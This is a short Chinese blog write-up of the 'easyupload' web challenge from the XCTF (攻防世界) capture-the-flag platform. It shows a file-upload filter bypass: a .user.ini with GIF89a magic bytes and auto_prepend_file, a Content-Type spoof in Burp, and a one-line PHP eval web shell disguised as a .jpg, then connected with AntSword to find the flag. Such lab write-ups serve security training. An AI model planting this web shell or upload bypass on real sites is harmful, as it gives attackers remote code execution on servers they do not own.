攻防世界-WEB-easyupload

Lucifer_wei2023-09-17 10:53

1.新建.user.ini文件,内容如下

GIF89a

auto_prepend_file=a.jpg

2.上传该文件,并用burp抓包,将Content-Type: application/octet-stream修改为

Content-Type: image/jpg

3.放包,结果如下

  1. 新建a.txt文件,内容为

GIF89a

<?=eval($_REQUEST['cmd']);?>

保存后将文件后缀修改为.jpg

5.直接上传该文件即可成功上传

PS:按F12打开调试器选择网络查看上传文件的地址

如图所示上传地址为:****/uploads/index.php

6.直接蚁剑连接

7.结果如下

8.查找flag

相关推荐
testpassportcn7 天前
CISA 認證介紹|IT 審計與資安治理黃金證照
网络·学习·改行学it
hqyjzsb11 天前
企业AI人才库的搭建体系与长效运营管理方案
人工智能·学习·职场和发展·创业创新·学习方法·业界资讯·改行学it
hqyjzsb12 天前
企业采购AI培训服务的供应商评估体系与选型方案
人工智能·职场和发展·创业创新·学习方法·业界资讯·改行学it·高考
hqyjzsb15 天前
企业培训ROI深度分析:如何将CAIE认证的显性与隐性成本纳入投资回报率模型
人工智能·考研·职场和发展·创业创新·学习方法·业界资讯·改行学it
testpassportcn20 天前
AWS DOP-C02 認證完整解析|AWS DevOps Engineer Professional 考試
网络·学习·改行学it
testpassportcn22 天前
CompTIA XK0-006 認證介紹|CompTIA Linux+ 最新考試內容、重點與備考全解析
网络·学习·改行学it
愚者游世25 天前
Delegating Constructor(委托构造函数)各版本异同
开发语言·c++·程序人生·面试·改行学it
愚者游世1 个月前
力扣解决二进制&题型常用知识点梳理
c++·程序人生·算法·leetcode·职场和发展·改行学it
CCPC不拿奖不改名1 个月前
RAG基础:基于LangChain 的文本分割实战+文本分块
人工智能·python·langchain·知识库·改行学it·rag·向量库
LXS_3571 个月前
C++常用容器(下)---stack、queue、list、set、map
开发语言·c++·学习方法·改行学it
热门推荐
01GitHub 镜像站点02OpenClaw 使用和管理 MCP 完全指南03OpenClaw + 飞书(Feishu)环境搭建指南04OpenClaw优化飞书API 额度已耗尽问题05Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services06Clawdbot部署教程:解决‘gateway token missing’授权问题的完整步骤07Window 10部署openclaw报错node.exe : npm error code 12808小黑课堂计算机二级WPSoffice题库软件下载安装教程(2026年3月最新版)09OpenClaw大龙虾机器人完整安装教程10网站改了域名,如何查找?